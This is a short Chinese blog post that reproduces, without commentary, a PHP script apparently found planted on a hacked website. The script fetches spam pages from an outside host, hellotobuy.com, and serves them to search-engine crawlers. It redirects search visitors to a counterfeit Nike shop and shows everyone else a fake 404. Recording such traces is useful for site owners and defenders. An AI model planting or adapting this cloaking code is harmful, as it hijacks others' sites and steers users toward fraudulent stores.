黑客作案痕迹 

  1 <?php
  2 define("DESURL","http://data.hellotobuy.com/nike/5nike5PuXN7/index.php");
  3 $shellurl = 'http://'.$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
  4 
  5 //定义脚本路径
  6 define("SHELLURL",$shellurl);
  7 $host = $_SERVER['HTTP_HOST'];
  8 //echo $_SERVER['HTTP_USER_AGENT'];die;
  9 echo $_SERVER['HTTP_ACCEPT_LANGUAGE'];die;
 10 //判断是否是蜘蛛
 11 function is_spider(){
 12     $robot = 0;
 13     //Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 UBrowser/4.0.3647.11 Safari/537.36
 14     $USER_AGENT = strtolower($_SERVER['HTTP_USER_AGENT']);
 15     if(strpos($USER_AGENT,"bot")) $robot = 1;
 16     if(strpos($USER_AGENT,"spider")) $robot = 1;
 17     if(strpos($USER_AGENT,"slurp")) $robot = 1;
 18     if(strpos($USER_AGENT,"google")) $robot = 1;
 19     if(strpos($USER_AGENT,"fast-webcrawler")) $robot = 1;
 20     if(strpos($USER_AGENT,"altavista")) $robot = 1;
 21     if(strpos($USER_AGENT,"ia_archiver")) $robot = 1;
 22     return $robot;
 23 }
 24 function p($arr){
 25     echo "<pre>";
 26     print_r($arr);
 27     echo "</pre>";
 28 }
 29 
 30 function from_se(){
 31     $fromse = 0;
 32     $REFERER = $_SERVER["HTTP_REFERER"];
 33     if(strpos($REFERER,"google")) $fromse = 1;
 34     if(strpos($REFERER,"yahoo")) $fromse = 1;
 35     if(strpos($REFERER,"bing")) $fromse = 1;
 36     if(strpos($REFERER,"aol")) $fromse = 1;
 37     if(strpos($REFERER,"ask")) $fromse = 1;
 38     return $fromse;
 39 }
 40 //判断是否是中文
 41 function is_lang_zh()
 42 {
 43     $langs=$_SERVER['HTTP_ACCEPT_LANGUAGE'];
 44     if(strpos($langs,"zh")!==false)
 45         return 1;
 46      else
 47      return 0;
 48 }
 49 function GetHttpPage($url) {
 50     $output = '';
 51     $time_out = 30;
 52     if (function_exists ( 'curl_init' )) {
 53         $ch = curl_init ();
 54         curl_setopt ( $ch, CURLOPT_URL, $url );
 55         curl_setopt ( $ch, CURLOPT_RETURNTRANSFER, true );
 56         curl_setopt ( $ch, CURLOPT_BINARYTRANSFER, true );
 57         curl_setopt ( $ch, CURLOPT_CONNECTTIMEOUT, $time_out );
 58         curl_setopt ( $ch, CURLOPT_FOLLOWLOCATION,1);
 59         curl_setopt ( $ch, CURLOPT_USERAGENT,"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
 60         $output = curl_exec ( $ch );
 61         curl_close ( $ch );
 62     } elseif (function_exists ( 'file_get_contents' )) {
 63         ini_set('user_agent', 'Googlebot/2.1 (+http://www.googlebot.com/bot.html)');
 64         $context = stream_context_create(array('http' => array('timeout' => $time_out)));
 65         $output = file_get_contents ( $url, false, $context);
 66     } elseif (ini_get ( "allow_url_fopen" ) == "1") {
 67         $errstr = '';
 68         $errno = '';
 69         $info = parse_url ( $url );
 70         $fp = fsockopen ( $info ["host"], 80, $errno, $errstr, $time_out ) or exit ( $errstr . "--->" . $errno );
 71         $head = "GET " . $info ['path'] . "?" . $info ["query"] . " HTTP/1.1\r\n";
 72         $head .= "Host: " . $info ['host'] . "\r\n";
 73         $head .= "Connection: Close\r\n\r\n";
 74         fwrite($fp, $head);
 75         while ( ! feof ( $fp ) ) {
 76             $output .= fgets ( $fp, 128 );
 77         }
 78         fclose ( $fp );
 79     }
 80     return $output;
 81 }
 82     //查询条件    id=123
 83     $qstring=$_SERVER["QUERY_STRING"];
 84     $is_zh=is_lang_zh();
 85     $is_spider = is_spider();
 86     $from_se = from_se();
 87 
 88         $htmls = GetHttpPage(DESURL . "?" . $qstring);
 89         $htmls = str_replace("{host}",$host,$htmls);
 90         
 91         $desurlmv=DESURL;
 92         $desurlmv = str_ireplace('/','\/',$desurlmv);
 93         $htmls=preg_replace('/href\s*=\s*(["\'])'.$desurlmv.'/iU','href=$1'.SHELLURL, $htmls);      
 94         $htmls=preg_replace('/href\s*=\s*(["\'])\//iU','href=$1'.SHELLURL, $htmls);
 95         $htmls=preg_replace('/href\s*=\s*(["\'])(?!http)/iU','href=$1'.SHELLURL.'$2', $htmls);
 96         
 97         $shellurlmv = SHELLURL;
 98         $shellurlmv = str_ireplace('?','',$shellurlmv);
 99         $shellurlmv = str_ireplace('/','\/',$shellurlmv);
100         $htmls = preg_replace('/href\s*=\s*(["\'])'.$shellurlmv.'\?(.*\.css)/iU','href=$1'.DESURL.'$2' , $htmls);
101         $htmls = preg_replace('/href\s*=\s*(["\'])'.$shellurlmv.'\?(.*\.ico)/iU','href=$1'.DESURL.'$2' , $htmls);
102         
103         $htmls = preg_replace('/src\s*=\s*(["\'])\//iU','src=$1'.DESURL , $htmls);
104         $htmls=preg_replace('/src\s*=\s*(["\'])(?!http)/iU','src=$1'.DESURL.'$2', $htmls);
105                     
106         $htmls=preg_replace('/\?\s*(["\'])/iU','$1', $htmls);
107         $htmls=preg_replace('/<input\s*type=\s*["\']\s*hidden.*\/\s*>/iU','', $htmls);
108 
109     if($is_spider==1)
110     {
111          echo $htmls;
112     }
113     else if($from_se==1)
114     {
115          header("Location: http://nike.hellotobuy.com/"); 
116     }
117     else
118     {
119          header('HTTP/1.1 404 Not Found');
120          echo '404 Not Found';
121     }
122 ?>

 

posted @ 2015-03-10 09:10  前度天下  阅读(390)  评论(0编辑  收藏  举报